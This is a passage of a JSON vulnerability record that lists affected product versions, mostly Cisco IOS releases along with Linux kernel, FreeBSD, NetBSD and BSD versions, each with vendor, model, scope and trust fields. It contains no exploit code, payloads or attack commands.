        "version": "3.0.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(24\\)s6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.11"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(28\\)s5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(14\\)e1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.99"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.48"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(11.5\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yq"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "5.2.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)bz"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(27b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(13a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)bc3c"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17d\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xn"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2cz"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(3.4\\)bp"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(26\\)s1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.9.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(14\\)s7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)zk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(8\\)s1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)dx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)t9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zo"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(13\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.56"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(23\\)s3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.2.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3db"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xq"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(12c\\)ew4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1dc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)s3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16\\)st"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yd6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yj"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(11b\\)t2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(9\\)ex3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(20\\)sl"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.34.1"
      },
      {
        "model": "bsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsd",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.1.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(14\\)yt1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sxe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)st6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(8a\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xa1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(24.2\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)xl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3jeb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(2\\)xc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)ew3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ye"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yh"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(5a\\)b2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(19\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)mc2e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yy"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)xm2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)s2a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(26\\)sv1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(4\\)e3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2bc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(6a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(28\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "10.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3\\(1\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)seb3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3tpc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)ja"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)b"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)yi1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(14\\)eb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xa"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.20"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)jk"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.2.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)yp1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0w5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)ze"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(20\\)ea1a"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(14a\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(20\\)aa4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12\\)da9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(23\\)s4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2fx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yv"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yb4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)yg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(8\\)yg3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(12\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(9a\\)bc6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)t"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.20"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.17"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16\\)s8a"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "1.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)s6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(13\\)e9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ez"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(3b\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4sw"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.33.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(28\\)s3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)dc2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1ya"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)ewa2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3bw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)zc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(6\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(12\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)bc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16\\)w5\\(21\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(25\\)s1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(7a\\)ey"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)t8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xc"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)ez2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(13\\)ja1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(25.4\\)s1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(15b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(2\\)xi"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)ey3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)xk3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3jx"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.11"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xs"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "3.5.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0ev"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)xw"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "4.8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(25\\)seb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)se3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(16\\)s10"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1sec"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2sea"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xe"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)xv4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(15\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0sy"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(3\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sxe3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zd"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)ey"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1yh"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sv"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(19\\)ew3"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.1.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)xc4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8a\\)ew"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(36\\)cc4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(17a\\)sxa"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "2.1.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(2\\)xc3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2jk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(21\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)s3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(20\\)eu2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)ey"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1\\)s"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)mx1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2zq"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)ez1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sxf"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)ys1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(2b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(13\\)aa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(28\\)w5-32a"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xl"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(2\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2xj"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)"
      },
      {
        "model": "bsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "bsd",
        "version": "4.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xp"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xd"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.40"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3\\)xp"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3yu"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.24"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "freebsd",
        "version": "1.1.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.31"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)xe2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.18.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(12\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(21\\)s6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
